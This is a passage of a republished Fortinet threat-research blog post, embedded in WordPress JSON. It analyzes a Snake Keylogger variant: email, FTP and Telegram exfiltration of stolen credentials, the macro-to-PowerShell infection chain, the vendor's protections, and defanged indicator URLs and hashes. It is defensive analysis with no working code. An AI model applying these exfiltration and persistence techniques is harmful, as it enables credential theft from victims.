aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\/_jcr_content\/root\/responsivegrid\/image_1738762118.img.png\/1635972321957\/picture15.png\" alt=\"Figure 5.1 \u2013 Craft email with stolen credentials\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 5.1 \u2013 Craft email with stolen credentials<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Figure 5.1 shows the email with the stolen credentials being crafted before it is sent to the attacker. The bottom of the figure shows the email\u2019s Subject and Body. The stolen credentials are placed in two attachments, \u201cPasswords.txt\u201d and \u201cUser.txt\u201d. Figure 5.2 is a screenshot of \u201cPassword.txt\u201d attached to the email sent to the attacker, containing basic information and credentials stolen from my testing Windows system.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--offset--default--4 aem-GridColumn--default--5\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\/_jcr_content\/root\/responsivegrid\/image_336698810.img.png\/1635972356954\/picture16.png\" alt=\"Figure 5.2 \u2013 Example of \u201cPassword.txt\u201d\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 5.2 \u2013 Example of \u201cPassword.txt\u201d<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>To send stolen data to the attacker, it defines some variables containing the sender\u2019s email address, 
password, SMTP server address, and SMTP port, as shown in Figure 5.3. It defines these variables in the class\u2019s constructor function.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\/_jcr_content\/root\/responsivegrid\/image_282522549.img.png\/1635972397815\/picture17.png\" alt=\"Figure 5.3 \u2013 The attacker\u2019s email address is hard-coded in the constructor function.\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 5.3 \u2013 The attacker\u2019s email address is hard-coded in the constructor function.<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Besides sending data via email, this Snake Keylogger variant also offers FTP and Telegram\u00a0methods to submit collected sensitive data to the attacker.\u00a0<\/p>\n<p>For FTP, the attacker needs to set up an FTP server and then configure Snake Keylogger with the FTP server\u2019s address and credentials so that it can upload the stolen sensitive data.<\/p>\n<p>For Telegram, Snake Keylogger uses the \u201csendDocument\u201d\u00a0method of the \u201cTelegram Bot API\u201d to submit its stolen data to the Telegram account that the attacker provides. 
Refer to Figure 5.4 for more information about the Telegram method.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\/_jcr_content\/root\/responsivegrid\/image_1026916908.img.png\/1635972436432\/picture18.png\" alt=\"Figure 5.4 \u2013 Partial code of submitting data using Telegram\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 5.4 \u2013 Partial code of submitting data using Telegram<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<h2>Conclusion on Snake Keylogger Malware\u00a0<\/h2>\n<p>To better understand the entire process of this malware, I drew a flow chart in Figure 6.1 that outlines the main steps explained in this analysis.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\/_jcr_content\/root\/responsivegrid\/image_1095875477.img.png\/1635972503891\/picture19.png\" alt=\"Figure 6.1 \u2013 The flow chart of the variant of Snake Keylogger\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 6.1 \u2013 The flow chart of the variant of Snake Keylogger<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>At the beginning of this analysis, we went through how a malicious Macro inside an Excel document executes 
PowerShell that downloads the Snake Keylogger&#8217;s downloader.\u00a0<\/p>\n<p>Next, I focused more on how the Snake Keylogger installer performs persistence on the victim&#8217;s device and the complicated, tricky way it extracts the payload of Snake Keylogger.<\/p>\n<p>I then elaborated on the features this variant of Snake Keylogger offers, like recording keystrokes, collecting credentials data, clipboard data, and screenshots.\u00a0<\/p>\n<p>And finally, I explained how the collected data is submitted to the attacker via email, as well as two other methods: FTP and Telegram.<\/p>\n<h2>Fortinet Protections<\/h2>\n<p>Fortinet customers are already protected from this malware by <a href=\"https:\/\/www.fortinet.com\/support-and-training\/support-services\/fortiguard-security-subscriptions\/web-filtering.html?utm_source=blog&amp;utm_campaign=web-filtering\">FortiGuard\u2019s Web Filtering<\/a>, AntiVirus, <a href=\"https:\/\/www.fortinet.com\/products\/endpoint-security\/fortiedr.html?utm_source=blog&amp;utm_campaign=fortiedr\">FortiEDR<\/a>, and CDR (content disarm and reconstruction) services, as follows:<\/p>\n<p>The malicious Macro inside the Excel sample can be disarmed by the FortiGuard CDR (content disarm and reconstruction) service.<\/p>\n<p>All relevant URLs have been rated as &quot;<b>Malicious Websites<\/b>&quot; by the FortiGuard Web Filtering service.<\/p>\n<p>The\u00a0original Excel sample and Snake Keylogger downloader files are detected as &quot;<b>VBA\/SnakeKeylogger.84D0!tr<\/b>&quot; and &quot;<b>MSIL\/SnakeKeylogger.ADFA!tr<\/b>&quot; and are blocked by the FortiGuard AntiVirus service.<b><\/b><\/p>\n<p>FortiEDR detects the downloaded executable file as malicious\u00a0based on its behavior.<\/p>\n<p>FortiMail protects Fortinet customers by blocking phishing emails.<\/p>\n<p>We also suggest that readers go\u00a0through the\u00a0free\u00a0<a href=\"https:\/\/training.fortinet.com\/?utm_source=blog&amp;utm_campaign=nse-institute\">NSE 
training<\/a>:\u00a0<a href=\"https:\/\/training.fortinet.com\/local\/staticpage\/view.php?page=nse_1&amp;utm_source=blog&amp;utm_campaign=nse-1\">NSE 1 \u2013 Information Security Awareness<\/a>, which has a module on Internet threats designed to help end users learn how to identify and protect themselves from phishing attacks.<\/p>\n<h2>IOCs<\/h2>\n<p><b>URLs:<\/b><\/p>\n<p>&quot;hxxp[:]\/\/3[.]64[.]251[.]139\/v3\/2\/Requests07520000652.exe&quot;<br \/> &quot;hxxps[:]\/\/store2[.]gofile[.]io\/download\/0283e6ba-afc6-4dcb-b2f4-3173d666e2c4\/Huzeigtmvaplpinhoo.dll&quot;<\/p>\n<p><b>Sample SHA-256:<\/b><\/p>\n<p>[SOA# 1769.xlsm]<br \/> 3B437BAA9A07E9DECE2659F20B5D97F8F729BA077D399933041CDC656C8D4D04<\/p>\n<p>[Requests07520000652.exe or\u00a0Wheahmnfpgaqse.exe]<br \/> 53D520C1F12FE4E479C6E31626F7D4ABA5A65D107C1A13401380EBCA7CCA5B05<\/p>\n<p><b>References:<\/b><\/p>\n<p>https:\/\/blog.checkpoint.com\/2021\/08\/12\/july-2021s-most-wanted-malware-snake-keylogger-enters-top-10-for-first-time\/<br \/> https:\/\/docs.microsoft.com\/en-us\/dotnet\/api\/system.appdomain.assemblyresolve?view=net-5.0<br \/> https:\/\/docs.microsoft.com\/en-us\/dotnet\/api\/system.appdomain.resourceresolve?view=net-5.0<\/p>\n<p><i>Learn more about Fortinet\u2019s\u00a0<\/i><a href=\"https:\/\/www.fortinet.com\/fortiguard\/labs?utm_source=blog&amp;utm_campaign=fortiguard-labs\"><i>FortiGuard Labs<\/i><\/a><i>\u00a0threat research and intelligence organization and the FortiGuard Security Subscriptions and Services\u00a0<\/i><a href=\"https:\/\/www.fortinet.com\/fortiguard\/labs?tab=security-bundles&amp;utm_source=blog&amp;utm_campaign=security-bundles\"><i>portfolio<\/i><\/a><i>.<\/i><\/p>\n<p><i>Learn more about Fortinet\u2019s\u00a0<\/i><a href=\"https:\/\/www.fortinet.com\/training\/cybersecurity-professionals?utm_source=blog&amp;utm_medium=campaign&amp;utm_campaign=Freetraininginitiative\"><i>free cybersecurity training<\/i><\/a><i>,\u00a0an initiative of Fortinet\u2019s Training Advancement 
Agenda (TAA), or about the\u00a0<\/i><a href=\"https:\/\/training.fortinet.com\/?utm_source=blog&amp;utm_campaign=nse-institute\"><i>Fortinet\u00a0Network Security Expert program<\/i><\/a><a href=\"https:\/\/training.fortinet.com\/local\/staticpage\/view.php?page=fnsa&amp;utm_source=pr&amp;utm_campaign=fnsa\"><i>,\u00a0Security Academy program<\/i><\/a><i>,\u00a0and\u00a0<\/i><a href=\"https:\/\/www.fortinet.com\/corporate\/careers\/vets.html?utm_source=blog&amp;utm_campaign=fortivet\"><i>Veterans program<\/i><\/a><i>. Learn more about\u00a0<\/i><a href=\"https:\/\/www.fortinet.com\/fortiguard\/labs?utm_source=blog&amp;utm_campaign=FortiGuardLabs\"><i>FortiGuard Labs<\/i><\/a><i>\u00a0global threat intelligence and research and the\u00a0<\/i><a href=\"https:\/\/www.fortinet.com\/support\/support-services\/fortiguard-security-subscriptions\/fortiguard-services-bundles.html?utm_source=blog&amp;utm_campaign=fortiguard-service-bundles\"><i>FortiGuard Security Subscriptions and Services<\/i><\/a><i>\u00a0portfolio.<\/i><\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\">\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<p><a href=\"https:\/\/www.fortinet.com\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\" target=\"bwo\" >http:\/\/feeds.feedburner.com\/fortinet\/blog\/threat-research<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\/_jcr_content\/root\/responsivegrid\/image.img.png\/1635971358250\/picture1.png\"\/><br \/>FortiGuard Labs recently discovered a fresh variant of the Snake Keylogger malware. 
Learn how it is downloaded and executed through a captured Excel sample, what techniques this variant uses to protect it from being analyzed, and what sensitive information it steals from a victim\u2019s machine.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10424,10378],"tags":[],"class_list":["post-17983","post","type-post","status-publish","format-standard","hentry","category-fortinet","category-security"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/17983","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=17983"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/17983\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=17983"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=17983"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=17983"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}